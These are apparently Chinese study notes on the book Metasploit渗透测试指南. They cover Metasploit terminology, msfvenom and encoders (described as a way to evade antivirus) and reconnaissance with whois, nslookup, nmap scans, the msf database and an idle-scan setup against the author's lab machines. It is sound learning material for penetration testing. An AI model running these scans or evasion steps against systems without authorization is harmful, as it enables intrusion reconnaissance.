精华内容
下载资源
问答
  • metasploit渗透测试指南
    2020-01-20 20:37:13

    第一章 渗透测试技术基础

    渗透测试执行标准 http://www.pentest-standard.org/index.php/Main_Page
    技术指南 http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines

    1.1 PTES中的渗透测试阶段

    1.1.1 前期交互阶段
    通常是你与客户组织进行讨论,来确定渗透测试的范围和目标。
    1.1.2 情报搜集阶段
    采用各种方法搜集要攻击客户组值的所有信息。
    提示,可以使用一个与你要发起的主要攻击行为处于完全不同范围的ip地址,来进行非常“喧闹”的扫描,这样可以帮助你确定客户组织是否能够很好的检测和响应你 所使用的攻击工具和技术。
    1.1.3 威胁建模阶段
    使用搜集到的信息标识可能存在的安全漏洞和弱点。
    1.1.4 漏洞分析阶段
    确定攻击方法后考虑如何获得访问权。
    1.1.5 渗透攻击阶段
    渗透成功。
    1.1.6 后渗透攻击阶段
    确定各种不同系统的用途,在这些难以处理的的场景中寻找可用信息,激发灵感,并达成你所设计的攻击目的。
    1.1.7 报告阶段
    报告是渗透测试过程中最重要的因素,使用报告文档来交流你在渗透测试过程中做了哪些,如何做的,一级最为重要的客户组织如何修复你所发现的安全漏洞和弱点。报告应该分为摘要。过程展示和级数发现这及格部分,技术发现这及格部分。

    1.2 渗透测试类型

    1.2.1 白盒测试
    有时也被称为“白帽测试“,是指渗透测试这在拥有客户组织所有知识的情况下所进行的测试;
    1.2.2 黑盒测试
    设计为模拟对客户组织一无所知的攻击者所进行的渗透攻击;
    1.2.3 灰盒测试
    介于白盒和黑盒之间,测试者具有客户组织的部分信息,可以组合黑盒测试和白盒测试技术实施渗透测试。在大多数渗透测试场景中往往是更理想的方法。
    1.3 漏洞扫描器
    用来找出指定系统或应用中安全漏洞的自动化工具
    https://blog.csdn.net/henni_719/article/details/77895891

    第二章 Metasploit基础

    2.1 专业术语

    2.1.1 渗透攻击(Exploit)

    渗透攻击是指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。流行的渗透攻击技术包括缓冲区溢出、Web应用程序漏洞攻击(比如SQL注入),及利用配置错误等。

    2.2.2 攻击载荷 (Payload)

    攻击载荷是我们期望目标系统在被渗透攻击之后去执行的代码,在Metasploit框架中可以自由的选择、传送和植入。例如,反弹式的shell是一种从目标主机到攻击主机创建网络连接,并提供Windows命令行shell的攻击载荷,而bindshell攻击载荷则是在目标主机上将命令行shell绑定到一个打开的监听端口,攻击者可以连接这些端口来取得shell交互。攻击载荷也可能是简单的在目标操作系统上执行一些命令,如添加用户账号等。

    2.1.3 shellcode

    shellcode是在渗透攻击时作为攻击载荷运行的一组机器指令。shellcode通常以汇编语言编写。在大多数情况下,目标系统执行了shellcode这一组指令之后,才会提供一个命令行shell或者Meterpreter shell,这也是shellcode名称的又来。

    2.1.4 模块(Module)

    一个模块是指Metasploit框架中所使用的一段软件代码组件。

    2.1.5 监听器(Listener)

    监听器是Metasploit中用来等待接入网络连接的组件,举例来说在目标主机被渗透攻击之后,它可能会通过互联网回连到攻击主机上,而监听器组件在攻击主机上等待被渗透攻击的系统来连接,并负责处理这些网络连接。

    2.2 Metasploit 用户接口

    Metasploit软件为它的基础功能提供了多个用户接口,包括终端,命令行和图形化界面等。除了这些接口之外,功能程序则提供了对Metasploit框架中内部功能的直接访问,这些功能程序对于渗透代码开发,以及不需要整体框架的灵活性场合非常有价值。

    2.2.1 MSF终端

    是目前Metasploit框架最为流行的用户接口,是Metasploit框架中最灵活,功能最丰富以及支持最好的攻具之一。MSF终端提供了一站式的接口,能够访问Metasploit框架中几乎每一个选项和配置。
    *启动MSF终端
    在命令行中执行msfconsole
    root@kali:~# msfconsole
    #cowsay++


    < metasploit >

       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *
    
       =[ metasploit v5.0.41-dev                          ]
    
    • – --=[ 1914 exploits - 1074 auxiliary - 330 post ]
    • – --=[ 556 payloads - 45 encoders - 10 nops ]
    • – --=[ 4 evasion ]

    msf5 > help connect
    Usage: connect [options]

    Communicate with a host, similar to interacting via netcat, taking advantage of
    any configured session pivoting.

    OPTIONS:

    -C        Try to use CRLF for EOL sequence.
    -P <opt>  Specify source port.
    -S <opt>  Specify source address.
    -c <opt>  Specify which Comm to use.
    -h        Help banner.
    -i <opt>  Send the contents of a file.
    -p <opt>  List of proxies to use.
    -s        Connect with SSL.
    -u        Switch to a UDP socket.
    -w <opt>  Specify connect timeout.
    -z        Just try to connect, then return.
    

    2.2.2 MSF命令行
    2.2.3 Armitage
    执行Armitage命令来启动Armitage,在启动过程中选择”Start MSF“就可以让Armitage连接到你的Metasploit实例上
    https://blog.csdn.net/henni_719/article/details/77662693

    2.3 Metasploit 功能程序

    2.3.1 MSF攻击载荷生成器
    MSF攻击载荷生成器允许你能够生成shellcode,可执行代码和其他更多的东西,也可以让他们在框架软件之外的渗透代码中进行使用。
    shellcode可以生成包括C,Javascript,甚至应用程序中Visual Basic脚本在内的多种格式,每种输出格式在不同场景中使用。比如,你在使用Python语言编写一个渗透攻击的概念验证代码(POC:Proof of Concept),那么C语言的格式输出是最好的;如果你在编写一个浏览器渗透攻击代码,那么以JavaScript语言方式输出的shellcode将是最适合的,在你选择了你所期望的输出之后,你可以简单的将这个攻击载荷直接加入到一个HtTML文件中来触发渗透攻击。
    如需查看msfvenom这个功能程序需要哪些配置选项,在命令行中输入msfvenom -h
    如果对某个攻击模块感兴趣而不清楚它的配置选项时,采用payload-options就可以列出所必备和可选的选项列表。
    2.3.2 MSF编码器
    可以帮助你通过对原始攻击载体载荷进行编码的方式,来避免坏字符,以及逃避杀毒软件和IDS的检测。
    在遭遇麻烦的时候,你可能需要求助于最强大的x86/shikata——ga——nai编码器,在Metasploit中唯一一个拥有Excellent等级的编码器,而这种等级是基于一个模块的可靠性和稳定性来进行评价的。对于编码器,一个Excellent的评价代表着它的应用面最广,而且较其他编码器可以容纳更大程度的代码微调。如果需要查看有哪些可用的编码器以及它们的等级,你可以使用msfvenom -1 encoders命令
    2.3.3 Nasm shell
    Nasm——shell.rb 功能程序在你尝试了解汇编代码含义时是一个非常有用的手头工具,特别是当你进行渗透代码开发时,你需要对给定的汇编命令找出它的opcode操作码,那你就可以使用这个功能程序来帮助你。
    比如,当我们运行这个工具,并请求jmp esp命令的opcode操作码时,nasm——shell将回告诉我们是FFE4

    暂时咕咕咕了

    更多相关内容
  • 介绍Metasploit使用方法,进行各种各样的渗透测试
  • Metasploit渗透测试指南(中文完整清晰版).pdf 便宜实惠Metasploit渗透测试指南(中文完整清晰版).pdf 便宜实惠Metasploit渗透测试指南(中文完整清晰版).pdf 便宜实惠Metasploit渗透测试指南(中文完整清晰版).pdf 便宜...
  • 软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。 Metasploit的设计初衷是打造成一个攻击工具开发平台,本书稍后将讲解...
  • Metasploit渗透测试指南 修订版,是Metasploit框架渗透测试入门畅销近十年的口碑好书!!PDF扫描版,有详细书签!
  • Metasploit渗透测试指南(中文完整清晰版)
  • Metasploit渗透测试指南

    千次阅读 2020-12-07 22:01:14
    目录 1.Metasploit与nmap 1.将Nmap输出的结果导入metasploit ​2.在msf中使用nmap ​2.针对性扫描 1.SMB服务器消息块协议扫描 ​2.搜寻配置不当的Mircrosoft SQL Server ...专用漏洞扫描器——1....​2....渗透攻击

    目录

    1.Metasploit与nmap

    1.将Nmap输出的结果导入metasploit

    ​2.在msf中使用nmap

    ​2.针对性扫描

    1.SMB服务器消息块协议扫描

    ​2.搜寻配置不当的Mircrosoft SQL Server

    ​3.ssh服务扫描

    ​4.FTP扫描

    5.简单网络管理协议扫描

    ​6.NetBIOS协议扫描

    漏洞扫描

    使用Nessus扫描

    专用漏洞扫描器——1.验证SMB登录

    ​2.扫描开放的VNC虚拟网络计算空口令

    3.扫描开放的X11服务器

    渗透攻击

    1.对windows xp的攻击

    2.攻击Metasploitable主机

    Meterpreter

    1.使用nmap扫描

    2.攻击MS SQL

    xp_cmdshell

    meterpreter基本命令

    通过跳板xp攻击metasploitable

    使用Meterpreter脚本

    1.vnc

    ​2.迁移进程

    3.关闭杀毒软件

    ​4.hashdump

    ​5.查看目标机器上的流量

    ​6.获取系统信息

    ​7.控制持久化

    ​8.通过附加的Railgun组件操作WindowsAPI


    Metasploit与nmap

    1.将Nmap输出的结果导入metasploit

    nmap -T4 -Pn -sS -A -oX result.xml 192.168.0.0/24
    
    msf5 > db_status
    db_import /home/kali/result.xml
    hosts -c address

     

    2.在msf中使用nmap

    db_nmap -sS -A 192.168.0.104
    services -u 

     

    2.针对性扫描

    1.SMB服务器消息块协议扫描

    msf5 > use auxiliary/scanner/smb/smb_version 
    msf5 auxiliary(scanner/smb/smb_version) > show options 
    msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.0.104
    RHOSTS => 192.168.0.104
    msf5 auxiliary(scanner/smb/smb_version) > run
    

     

    2.搜寻配置不当的Mircrosoft SQL Server

    msf5 > use auxiliary/scanner/mssql/mssql_ping 
    msf5 auxiliary(scanner/mssql/mssql_ping) > show options 
    msf5 auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/mssql/mssql_ping) > set THREADS 255
    THREADS => 255
    msf5 auxiliary(scanner/mssql/mssql_ping) > run
    

     

    3.ssh服务扫描

    msf5 > use auxiliary/scanner/ssh/ssh_version 
    msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/ssh/ssh_version) > set THREADS 100
    THREADS => 100
    msf5 auxiliary(scanner/ssh/ssh_version) > run
    

     

    4.FTP扫描

    1.版本扫描

    msf5 > use auxiliary/scanner/ftp/ftp_version 
    msf5 auxiliary(scanner/ftp/ftp_version) > show options 
    msf5 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/ftp/ftp_version) > set THREADS 100
    THREADS => 100
    msf5 auxiliary(scanner/ftp/ftp_version) > run
    

    2.检查是否允许匿名登录

    msf5 > use auxiliary/scanner/ftp/anonymous 
    msf5 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/ftp/anonymous) > set THREADS 100
    THREADS => 100
    msf5 auxiliary(scanner/ftp/anonymous) > run
    

     

    5.简单网络管理协议扫描

    msf5 > use auxiliary/scanner/snmp/snmp_login 
    msf5 auxiliary(scanner/snmp/snmp_login) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/snmp/snmp_login) > set THREADS 100
    THREADS => 100
    msf5 auxiliary(scanner/snmp/snmp_login) > run
    

     

    6.NetBIOS协议扫描

    msf5 > use auxiliary/scanner/netbios/nbname 
    msf5 auxiliary(scanner/netbios/nbname) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/netbios/nbname) > set THREADS 100
    THREADS => 100
    msf5 auxiliary(scanner/netbios/nbname) > run
    

     

    漏洞扫描

    使用Nessus扫描

    dpkg -i Nessus-8.12.1-debian6_amd64.deb 
    /bin/systemctl start nessusd.service
    https://kali:8834/

    1.导入nessus扫描结果

    msf5 > db_status
    [*] Connected to msf. Connection type: postgresql.
    msf5 > db_import /home/kali/Downloads/My_Basic_Network_Scan_vdxc5z.nessus
    
    
    
    msf5 > hosts -c address,svcs,vulns
    vulns    #查看漏洞详细信息列表

     

    2.msf中使用nessus扫描

    load nessus
    nessus_connect nessus:nessus@localhost:8834 ok    #连接nessus
    nessus_policy_list       #查看策略
    nessus_scan_new <UUID of Policy> <Scan name> <Description> <Targets>    #新建扫描目标
    nessus_scan_launch      #运行扫描
    nessus_scan_list        #查看扫描列表
    nessus_db_imprt id      #导入msf数据库
    

     

     

     

    专用漏洞扫描器——1.验证SMB登录

    msf5 > use auxiliary/scanner/smb/smb_login
    msf5 auxiliary(scanner/smb/smb_login) > show options 
    msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.0.100-110
    RHOSTS => 192.168.0.100-110
    msf5 auxiliary(scanner/smb/smb_login) > set SMBUSER administrator
    SMBUSER => administrator
    msf5 auxiliary(scanner/smb/smb_login) > set SMBPASS 123
    SMBPASS => 123
    msf5 auxiliary(scanner/smb/smb_login) > set VERBOSE false    #不输出所有的尝试
    VERBOSE => false
    msf5 auxiliary(scanner/smb/smb_login) > run
    

     

    2.扫描开放的VNC虚拟网络计算空口令

    msf5 > use auxiliary/scanner/vnc/vnc_none_auth 
    msf5 auxiliary(scanner/vnc/vnc_none_auth) > show options 
    
    Module options (auxiliary/scanner/vnc/vnc_none_auth):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT    5900             yes       The target port (TCP)
       THREADS  1                yes       The number of concurrent threads (max one per host)
    
    msf5 auxiliary(scanner/vnc/vnc_none_auth) > set RHOSTS 192.168.0.105
    RHOSTS => 192.168.0.105
    msf5 auxiliary(scanner/vnc/vnc_none_auth) > run

    vncviewer 192.168.0.105    #vnc连接
    

    3.扫描开放的X11服务器

     

    渗透攻击

    1.对windows xp的攻击

    1.使用nmap扫描

    nmap -sT -A --script=smb-vuln-ms08-067.nse -P0 192.168.0.106

     

    2.搜索并使用ms08_067渗透攻击模块

    msf5 > search ms08_067
    msf5 > use exploit/windows/smb/ms08_067_netapi
    msf5 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf5 exploit(windows/smb/ms08_067_netapi) > show targets 
    msf5 exploit(windows/smb/ms08_067_netapi) > set target 10
    target => 10
    msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.0.106
    RHOSTS => 192.168.0.106
    msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.0.109
    LHOST => 192.168.0.109
    msf5 exploit(windows/smb/ms08_067_netapi) > set LPORT 8008
    LPORT => 8008
    msf5 exploit(windows/smb/ms08_067_netapi) > show options 
    msf5 exploit(windows/smb/ms08_067_netapi) > exploit 

     

    3.sessions模块

    meterpreter > shell                                           #进入目标机器的shell
    C:\WINDOWS\system32>ipconfig
    meterpreter > background                                      #后台运行反弹shell
    msf5 exploit(windows/smb/ms08_067_netapi) > sessions -l -v    #查看meterpreter会话的详细信息
    msf5 exploit(windows/smb/ms08_067_netapi) > sessions -i 2     #进入session id为2的会话
    
    

     

    2.攻击Metasploitable主机

    1.nmap扫描

    nmap -sT -A -P0 192.168.0.105

     

    2.搜索vsftpd渗透攻击模块

    search vsftpd
    msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads 
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact 
    payload => cmd/unix/interact
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.0.105
    RHOSTS => 192.168.0.105
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit 
    

     

     

    Meterpreter

    xp安装ms_sql

    1.使用nmap扫描

    nmap -sT -A -P0 192.168.0.106

     

    2.攻击MS SQL

    2.1扫描目标系统的udp 1434端口

     

    2.2通过mssql_ping模块找出MS SQL服务端口,并进行用户名和口令的猜解

    msf5 > use auxiliary/scanner/mssql/mssql_ping 
    msf5 auxiliary(scanner/mssql/mssql_ping) > show options 
    msf5 auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 192.168.0.106
    RHOSTS => 192.168.0.106
    msf5 auxiliary(scanner/mssql/mssql_ping) > set THREADS 50
    THREADS => 50
    msf5 auxiliary(scanner/mssql/mssql_ping) > exploit 

     

    2.3暴力破解MS SQL服务

    msf5 > use auxiliary/scanner/mssql/mssql_login 
    msf5 auxiliary(scanner/mssql/mssql_login) > show options 
    msf5 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE /root/pass.txt
    PASS_FILE => /root/pass.txt
    msf5 auxiliary(scanner/mssql/mssql_login) > set THREADS 10
    THREADS => 10
    msf5 auxiliary(scanner/mssql/mssql_login) > set VERBOSE false
    msf5 auxiliary(scanner/mssql/mssql_login) > set USERNAME sa
    USERNAME => sa
    msf5 auxiliary(scanner/mssql/mssql_login) > set RHOSTS 192.168.0.106
    RHOSTS => 192.168.0.106
    msf5 auxiliary(scanner/mssql/mssql_login) > exploit 

     

    xp_cmdshell

    msf5 > use exploit/windows/mssql/mssql_payload
    msf5 exploit(windows/mssql/mssql_payload) > show options 
    msf5 exploit(windows/mssql/mssql_payload) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf5 exploit(windows/mssql/mssql_payload) > set LHOST 192.168.0.106
    LHOST => 192.168.0.106
    msf5 exploit(windows/mssql/mssql_payload) > set LPORT 5555
    LPORT => 5555
    msf5 exploit(windows/mssql/mssql_payload) > unset LHOST 
    Unsetting LHOST...
    msf5 exploit(windows/mssql/mssql_payload) > set LHOST 192.168.0.109
    LHOST => 192.168.0.109
    msf5 exploit(windows/mssql/mssql_payload) > set RHOSTS 192.168.0.106
    RHOSTS => 192.168.0.106
    msf5 exploit(windows/mssql/mssql_payload) > set PASSWORD 123
    PASSWORD => 123
    msf5 exploit(windows/mssql/mssql_payload) > exploit 
    

     

    meterpreter基本命令

    1.截屏

    meterpreter > screenshot
    Screenshot saved to: /home/kali/NCqEAJcr.jpeg
    

    2.sysinfo

    meterpreter > sysinfo 
    Computer        : XP-1A6862CF7BC
    OS              : Windows XP (5.1 Build 2600, Service Pack 2).
    Architecture    : x86
    System Language : zh_CN
    Domain          : MSHOME
    Logged On Users : 3
    Meterpreter     : x86/windows
    

    3.hashdump

     

    4.传递哈希值

    当抓取到Hash值,无法在短时间内破解出明文密码,可以通过传递hash值,使用windows/smb/psexec模块

    msf5 > use windows/smb/psexec
    msf5 exploit(windows/smb/psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf5 exploit(windows/smb/psexec) > set LHOST 192.168.0.109
    LHOST => 192.168.0.109
    msf5 exploit(windows/smb/psexec) > set LPORT 443
    LPORT => 443
    msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.0.106
    RHOSTS => 192.168.0.106
    msf5 exploit(windows/smb/psexec) > set SMBPASS ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678
    

     

     

    通过跳板xp攻击metasploitable

     

    1.建立路由

    meterpreter > run get_local_subnets 
    msf5 > route add 192.168.0.0 255.255.255.0 2        #192.168.0.0/24是metasploitable的网络   2是session id
    [*] Route added
    msf5 > route print 
    

    2.攻击

    msf5 > use exploit/unix/ftp/vsftpd_234_backdoor 
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact 
    PAYLOAD => cmd/unix/interact
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.0.105
    RHOSTS => 192.168.0.105
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > ifconfig
    

     

    使用Meterpreter脚本

     

    1.vnc

    meterpreter > run vnc
    meterpreter > run screen_unlock 

     

    2.迁移进程

    run post/windows/manage/migrate

     

    3.关闭杀毒软件

    run killav

     

    4.hashdump

     

    5.查看目标机器上的流量

    run packetrecorder -i 1
    

     

    6.获取系统信息

    meterpreter > run scraper 
    

     

    7.控制持久化

    meterpreter > run persistence -X -i 50 -p 443 -r 192.168.0.109    #-X开机自启动, -I 50秒重连一次
    
    
    msf5 > use exploit/multi/handler 
    msf5 exploit(multi/handler) > show options
    msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > exploit 
    
    

     

    8.通过附加的Railgun组件操作WindowsAPI

     

    展开全文
  • Metasploit渗透测试指南修订版》新版修订版,相较于旧版补充更新了很多
  • Metasploit渗透测试指南(全) .pdf
  • Metasploit渗透测试指南.pdf

    热门讨论 2012-12-10 10:28:47
    Metasploit渗透测试指南》获得了Metasploit开发团队的一致好评,Metasploit项目创始人HD Moore评价《Metasploit渗透测试指南》为:“现今最好的Metasploit框架软件参考指南”。 《Metasploit渗透测试指南》适合...
  • 第10章-Metasploit渗透测试之制作隐藏后门-v7 本课程设计目的只用于教学,切勿使用课程中的技术进行违法活 动,学员利用课程中的造成的技术后果与讲师本人无关,倡导维护网络安 全人人有责,共同维护网络文明和谐。
  • 完整扫描版带书签 Metasploit渗透测试指南.修订版Metasploit渗透测试指南.修订版
  • 1.ubuntu9.04 下载地址: http://old-releases.ubuntu.com/releases/jaunty/ 你会发现有很多版本的ubuntu。分别有desktop,server,alternate。 各版本区分: ...https://blog.csdn...

    1.ubuntu9.04
    下载地址:
    http://old-releases.ubuntu.com/releases/jaunty/
    你会发现有很多版本的ubuntu。分别有desktop,server,alternate。
    各版本区分:
    https://blog.csdn.net/weixin_37228977/article/details/81356131

    https://blog.csdn.net/mozart_cai/article/details/8579963

    作为实验环境找个有漏洞的能用就行,要有目的选择,省的浪费时间,别纠结!

    2.metasploitable:
    下载地址:
    https://sourceforge.net/projects/metasploitable/
    3.windows XP:
    下载地址:
    https://msdn.itellyou.cn/
    ed2k链接,可以使用百度网盘离线下载,再下载到本地
    也可以用迅雷下载,复制到剪切板即可

    安装WindowsXP出现的问题:
    安装IIS时候:

    安装管理和监视程序出现的问题:
    在这里插入图片描述
    出现这个问题,怎么解决?
    点击–>确定
    在这里插入图片描述
    点击–>浏览

    在这里插入图片描述
    注意:文件名和文件类型的地方,看出来要查找的文件是lmmib2.dll
    接下来到网上去下载这个文件。保存到一个你喜欢的地方。
    然后再这个界面找到这个文件就可以。
    在这里插入图片描述
    这样缺失的第一个文件就解决了。
    点击–>打开
    点击–>确定
    在这里插入图片描述
    然后又反反复复的出现这些错误,如下图:
    在这里插入图片描述
    别慌!点击浏览!
    在这里插入图片描述
    仍然可以看到缺失的文件名称和类型,去网上下载。hostmib.dll
    解决步骤和上面一样,会出现很多次这个问题,要有耐心。
    因为我们没有cd,所以缺少安装程序的一些必要文件,就只能去网上慢慢下载。

    下载到你想要的路径之后,并浏览。点击重试。还会出现一样的画面,反复做就好。

    这是我整理的安装文件,分别是IIS和SNMP。
    链接:https://pan.baidu.com/s/1VYW0lyNspoAZrpTYbxFZ_A
    提取码:y1kq

    剩下的按照书上的安装即可,失效的网站,拿自己的电脑做实验也挺好。

    展开全文
  • 2012_Metasploit渗透测试指南_网盘永久
  • 黑客之渗透初学

    根据pdf,总结自己认为比较重要的,欢迎大佬指错。

    1.Metasploit基础

    1.1专业术语

    1.1.1渗透攻击(Exploit)

    由攻击者或渗透测试者利用一个系统、应用或服务中心的安全漏洞进行的攻击行为。往往会造成开发者所没有预期到的一种特殊结果。

    1.1.2攻击载荷(Payload)

    目标系统在被渗透攻击之后去执行的代码,在Metasploit框架中可以自由地选择、传送和植入。

    1.1.3Shellcode

    渗透攻击时作为攻击载荷运行的一组机器指令,通常用汇编语言编写。

    1.1.4模块(Module)

    Metasploit框架里面包含了许多软件组件,代表的就是模块,比如渗透攻击模块、辅助模块等。

    1.1.5监听器(Listener)

    Metasploit框架中用来等来接入网络连接的组件,比如目标主机被渗透攻击之后,通过互联网进行连接。

    1.2用户接口

    Metasploit为用户提供了多种接口,包含终端、命令行、图形化界面等。

    1.2.1 MSF终端

    目前最流行的接口,灵活且功能丰富,后续的操作都基于此。启动命令:[msfconsole]
    在这里插入图片描述

    1.2.2MSF命令行

    主要用于脚本和其他命令行工具的互操作性。在明确渗透工具和参数时,使用这个将会效率翻倍。(目前好像被废弃了emmm)

    1.2.3Armitage

    一个界面交互系统,不比命令那么酣畅淋漓,简单介绍下(以后补)。

    #启动程序
    armitage
    

    1.3功能程序

    1.3.1MSF攻击载荷生成器

    简单就是把shellcode加入到各种文件中,js、html、py等等。

    1.3.2 MSF编码器

    简单来说就是加壳,给shellcode加点料,让别人(杀毒软件)看不懂。

    1.3.3Nasm Shell

    目前的理解就是把指令操作转化成汇编的工具。

    2.情报收集

    安全专家们都说是最重要的环节,用尽手段收集信息当然前提不能犯罪。比如渗透网站,就在网站的界面来回点,google该网站所属公司等碎片化信息,要想获取root权限,这些步骤必不可少。

    2.1被动信息收集

    不直接接触目标的情况下挖掘目标信息。比如接触运维人员,了解服务器的型号和系统等,也可以用whois工具在公开渠道获取情报。

    2.1.1 whois查询

    简单查询了下某个域名,发现这些游泳信息:①域名服务器:grs-whois.hichina.com(阿里云)②注册地址www.net.cn(阿里云)③更新时间,创建时间,创建者,注册商IANA编号④DNS服务器就是Name Server(ps:往往dns服务器部署在公司内部,解析域名和ip,所以看到很多对应关系)
    在这里插入图片描述

    2.1.2 Netcraft

    这个网站是在线的直接搜索即可https://sitereport.netcraft.com/
    在这里插入图片描述
    这里查到了ipv4的地址信息,我们直接whois查询ip地址,获取了一些信息(emmm好像没啥用)。
    在这里插入图片描述

    2.1.3 NSLookup

    获取服务器附加信息的工具。有比较多的命令行,这里简单介绍几个。

    A:指的是用来指定主机名或域名对应的IPv4记录
    AAAA:指的是用来指定主机名或域名对应的IPv6记录
    MX:邮件交换记录,它指向一个邮件服务器,用于电子邮件系统
    NS:用来指定该域名由那个DNS服务器来进行解析
    SOA:起始授权机构记录,SOA记录说明了在众多NS记录里那一台才是主要的服务器
    CNAME:别名记录,也称为规范名字。这种记录允许将多个名字映射到同一台计算机
    TXT:一般指为某个主机名或域名设置的说明
    

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    Non-authoritative answer:表示未证实回答,说明是缓存读来的,不是向服务商请求获得的。

    2.2主动信息收集

    2.2.1 Namp端口扫描

    #ping扫描,主机存活就扫描
    nmap -sP <域名或ip>
    
    #Tcp扫描,与扫描端口建立TCP连接(缺点会在目标主机留下日志溯源)
    nmap -sT <域名或ip>
    
    #半开扫描,SYN扫描需要要root(只建立第一次握手,失败就放弃一般不会被留痕)
    nmap -sS <ip地址>
    
    #路由追踪扫描,了解网络通行情况,各个节点花费的时间
    nmap -traceroute <域名或ip>
    
    #扫描网段下的ip(会根据地址搜索当前网段)
    nmap ip地址/24 
    
    #扫描一个目标列表
    nmap -iL [ip地址列表文件]
    
    #非ping扫描不执行主机发现,可以跳过防火墙(-PA:ACK方式,-PS:SYN方式,-PU:UDP方式,-PY:SCTP INIT)
    nmap -Pn <域名或ip>
    
    #脚本扫描
    nmap --script=[指令] [ip]
    auth:绕过鉴权扫描
    broadcast:在局域网探查更多服务开启情况
    brute:对常见http/smtp提供暴力破解
    dos:用于拒绝服务攻击
    vuln:用于检查目标主机是否有常见漏洞
    version:负责增强服务与版本扫描的功能的脚本
    malware:探测目标机是否感染了病毒,开启后门等信息
    fuzzer:模糊测试脚本,发送异常的包到目标机,探测出潜在漏洞
    
    #附加参数
    -p:指定扫描端口
    -A:全面系统检测,花费时间长
    -vv:对扫描结果详细输出
    -sV:探测打开对应的服务版本信息
    -O:操作系统检测
    -n:不进行域名解析
    

    2.2.2 使用数据库

    在实际的渗透场景中,可能需要多个主机,多个端口,所以比较好的方式就是将收集到的信息存入数据库统一管理。这里使用PostrgeSQL,因为这个是Metasploit默认的。

    2.2.2.1 连接数据库
    #启动数据库服务
    service postgresql start
    
    #初始化数据库
    msfdb init
    
    #启动msfconsole
    msfconsole
    
    #检测连接状态
    db_status
    
    #手动连接数据库
    db_connect msf:admin@127.0.0.1/msf
    
    #数据库配置文件
    vi /usr/share/metasploit-framework/config/database.yml
    

    在这里插入图片描述
    在这里插入图片描述

    连接成功
    在这里插入图片描述

    2.2.2.2 将nmap输出结果导入Metasploit
    #扫描虚拟机网段(oX表示输出位xml格式,Subnet1就是文件名)
    nmap -Pn -sS -A -oX Subnet1 192.168.48.0/24
    

    在这里插入图片描述
    在这里插入图片描述

    #连接数据库
    db_connect msf:admin@127.0.0.1/msf
    
    #导入数据
    db_import Subnet1
    
    #显示数据库主机信息
    db_hosts -C address
    

    在这里插入图片描述

    2.2.2.3 TCP空闲扫描

    高级扫描,冒充内网中另一台电脑的ip地址对目标主机进行探测。递增ip帧标志理解成一个数值,如果局域网内的某台主机是空闲的,那么这个数值将可以预测,高级扫描就是找到这样一台主机来进行伪装扫描。

    #使用scanner/ip/ipidseq框架
    use auxiliary/scanner/ip/ipidseq
    #参数说明
    show options
    

    在这里插入图片描述
    该列表展示了执行扫描所需要的参数
    RHOSTS被扫描的目标,可以使用ip地址段(192.168.1.110-192.168.1.212)、CIDR地址块(192.168.1.48.0/24)、使用逗号分隔的多个CIDR地址块(192.168.1.0/24,192.168.5.0/24)、以及每行包含一个IP地址的IP列表文本文件

    THREAD所有扫描模块的默认线程数为1,增加参数可以提高扫描速度,一般windows平台不超过16,unix平台不超过128。

    #指定cidr地址块
    set RHOSTS 192.168.48.0/24
    #线程数设置
    set THREADS 50
    

    在这里插入图片描述
    在这里插入图片描述

    这里捕获到两台空闲主机,133是我的xp,2就不知道是啥了,这里打算用空闲主机(192.168.1.2)对目标主机(192.168.1.133)进行扫描。这样我们就不需要通过自身ip发送任何数据包,就可以获取目标主机的端口信息。

    nmap -PN -sI 192.168.1.2 192.168.1.133
    

    在这里插入图片描述

    2.2.2.4 在MSF客户端运行nmap

    连接数据库后采用db_nmap,不仅可以扫描,还能把扫描到的数据存库。我这里只演示单主机,当然可以攻击多台。

    db_nmap -sS -A 192.168.48.133
    

    在这里插入图片描述

